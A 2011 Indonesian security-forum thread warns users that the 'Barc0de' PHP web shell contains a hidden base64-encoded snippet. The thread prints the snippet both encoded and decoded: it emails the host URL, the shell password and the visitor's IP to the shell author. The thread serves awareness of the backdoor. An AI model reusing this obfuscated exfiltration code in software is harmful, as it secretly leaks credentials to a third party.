Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

The largest cyber security forum in Indonesia with more than 129000 members
http://xcode.or.id/forum/

Shell Barcode stealer / keyloger

http://xcode.or.id/forum/viewtopic.php?f=100&t=41804

Page 1 of 1

Shell Barcode stealer / keyloger

Posted: Thu Jul 21, 2011 9:02 am
by yuans
semalam iseng
bongkar bongkar shell :-D
// Barc0de Ultimate - www.code-security.com
// Author : uzanc | [email protected]

ketika melihat shell barcode aku terkejut ternyata ada keyloger / script send mailer nya :-D BASE64

Code: Select all

JHZpc2l0Y291bnQgPSAkSFRUUF​9DT09LSUVfVkFSU1sidmlzaXRz​Il07DQogaWYoICR2aXNpdGNvdW​50ID09ICIiKQ0KIHskdmlzaXRj​b3VudCA9IDA7IA0KICR2aXNpdG​9yID0gJF9TRVJWRVJbIlJFTU9U​RV9BRERSIl07IA0KICR3ZWIgPS​AkX1NFUlZFUlsiSFRUUF9IT1NU​Il07DQogJGluaiA9ICRfU0VSVk​VSWyJSRVFVRVNUX1VSSSJdOw0K​ICR0YXJnZXQgPSByYXd1cmxkZW​NvZGUoJHdlYi4kaW5qKTsNCiAk​Ym9keSA9ICJCb3NzLCBhZGEgeW​FuZyB0ZWxhaCBtZW5hbmFtIGJh​Y2tkb29yIGRpIDogICR0YXJnZX​QgfCBwYXNzd29yZCA9ICRtZDVf​cGFzcyBJUCA9ICR2aXNpdG9yIj​sgQG1haWwoImFhdXphbmNAZ21h​aWwuY29tIiwiS2V5bG9nZXIgQm​Fja2Rvb3IiLCAiJGJvZHkiKTsN​CiB9IGVsc2UgeyANCiAkdmlzaX​Rjb3VudDsgDQogfSBzZXRjb29r​aWUoInZpc2l0cyIsJHZpc2l0Y2​91bnQpOw==\";
yang jika di artikan menjadi

Code: Select all

$visitcount = $HTTP_COOKIE_VARS["visits"​];
if( $visitcount == "")
{$visitcount = 0;
$visitor = $_SERVER["REMOTE_ADDR"];
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$target = rawurldecode($web.$inj);
$body = "Boss, ada yang telah menanam backdoor di : $target | password = $md5_pass IP = $visitor"; @mail("[email protected]",​"Keyloger Backdoor", "$body");
} else {
$visitcount;
} setcookie("visits",$visitc​ount);
jadi jangan sampe kita kena jebakan batman wkwkkwkwkwkk
maaf yah buat admin nya bukan untuk mempublikasi tapi supaya sadar saja :-D

Re: Shell Barcode stealer / keyloger

Posted: Sat Jul 23, 2011 1:36 am
by pras80
makasih bro..ternyata setelah di bongkar emang bener ada bro..makasih sharenya bro.. 8-) 8-)

Re: Shell Barcode stealer / keyloger

Posted: Wed Mar 14, 2012 9:09 pm
by Sunafets.exe
wah parah,, baru tau ane ada yg bgitu,,, bisa di encode ke base64 ternyata,, jadi ini yg namanya backdoor

ane sering liat yg bgini di dalem file html yg di save di komputer bervirus...

maap klo oot :D

Re: Shell Barcode stealer / keyloger

Posted: Sat Jul 07, 2012 12:08 pm
by mildmerah
Cara convert dari base64 ke text gimana caranya gan ? u,u
All times are UTC+07:00
Page 1 of 1
Powered by phpBB® Forum Software © phpBB Limited
https://www.phpbb.com/